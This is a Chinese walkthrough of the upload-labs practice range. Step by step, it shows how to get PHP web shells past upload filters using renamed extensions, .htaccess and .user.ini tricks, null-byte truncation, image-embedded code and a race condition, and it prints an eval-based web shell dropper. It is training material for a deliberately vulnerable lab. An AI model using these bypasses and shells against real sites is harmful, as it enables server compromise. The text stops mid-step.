upload-labs靶场通关（附靶场环境）

链接: https://pan.baidu.com/s/1GQP5zthh598A4Mp-WQM4vA 提取码: zovn

环境搭建

步骤一：将环境附件下载到phpstudy_pro\WWW下面修改名字为upload

步骤二：询问绑定地址

第一关  less-1

步骤一：上传一句话木马

步骤二：更改文件名后缀，将1.php改为1.jpg，利用burp进行抓包

步骤三：更改为1.php进行放包，上传成功

右击图片打开新窗口找到php文件

第二关：less-2

步骤一：更改文件名后缀，将1.php改为1.jpg，利用burp进行抓包

步骤二：更改为1.php进行放包，上传成功

右击图片打开新窗口找到php文件

第三关：less-3

步骤一：php文件重命名为1.php5

步骤二：右击右击图片打开，进行蚁剑连连接

第四关：less-4

步骤一：创建一个.htaccess文件，里面输入内容

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php

</FilesMatch>

步骤二：先上传.htaccess文件，再上传1.jpg，图片右键新建标签页打开图片

步骤三：进行蚁剑连连接

第五关：less-5

步骤一：创建一个.user.ini文件，输入内容auto_prepend_file = "1.jpg"

步骤二：先上传.user,ini文件，再上传1.jpg

步骤三：进行蚁剑连连接

第六关：less-6

步骤一：上传1.php抓包,将1.php改为1.phP，放行

第七关：less-7

步骤一：上传1.php抓包,将1.php后面加空格，放行

步骤二：图片右键新建标签页打开图片

步骤三：进行蚁剑连连接

第八关：less-8

步骤一：上传1.php抓包,将1.php后面加.，放行

步骤二：图片右键新建标签页打开图片

步骤三：进行蚁剑连连接

第九关：less-9

步骤一：上传1.php抓包,将1.php后面加::$DATA，放行

步骤二：图片右键新建标签页打开图片

第十关：less-10

步骤一：上传1.php文件抓包，1.php后面加.空格. 放行

步骤二：图片右键新建标签页打开图片

步骤三：进行蚁剑连连接

第十一关：less-11

步骤一：将1.php改为1.pphphp

步骤二：图片右键新建标签页打开图片

步骤三：进行蚁剑连连接

第十二关：less-12

步骤一：上传1.php文件抓包，将/upload/后面添加随便一个php文件%00，1.php改为1.jpg 放行

步骤二：图片右键新建标签页打开图片，删掉�/9320240830163621.jpg访问

第十三关：less-13

步骤一：上传1.php文件抓包，将/upload/后面添加随便一个php文件加空格，1.php改为1.jpg

步骤二：打开Hex，将6.php后面的空格对应的20改为00，放行

步骤三：图片右键新建标签页打开图片，删掉�/5320240830164829.jpg访问

第十四关：less-14

步骤一：将一张图片和一个php文件放在cmd根目录，运行copy a.jpg/b+1.php/a shell.jpg

步骤二：上传shell.jpg，图片右键新建标签页打开图片，打开文件包含漏洞,用file读取图片地址

第十五关：less-15

步骤一：上传shell.jpg，图片右键新建标签页打开图片，打开文件包含漏洞,用file读取图片地址

第十六关：less-16

环境不支持

第十七关：less-17

步骤一：图片需要二次渲染，上传图片，图片右键新建标签页打开图片，打开文件包含漏洞,用file读取图片地址

步骤二：进行蚁剑连连接

第十八关：less-18

步骤一：php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

步骤二：上传文件，burp抓包，发送到 intruder 模块，设置⽆限发送空的payloads，无限重复；

步骤三：访问1.php抓包，发送到 intruder 模块，设置⽆限发送空的payloads，无限重复；

步骤四：同时攻击，直到出现webshell.php

步骤五：访问webshell.php，进行蚁剑连连接

第二十关：less-20

步骤一上传php文件，保存名称改为1.php/.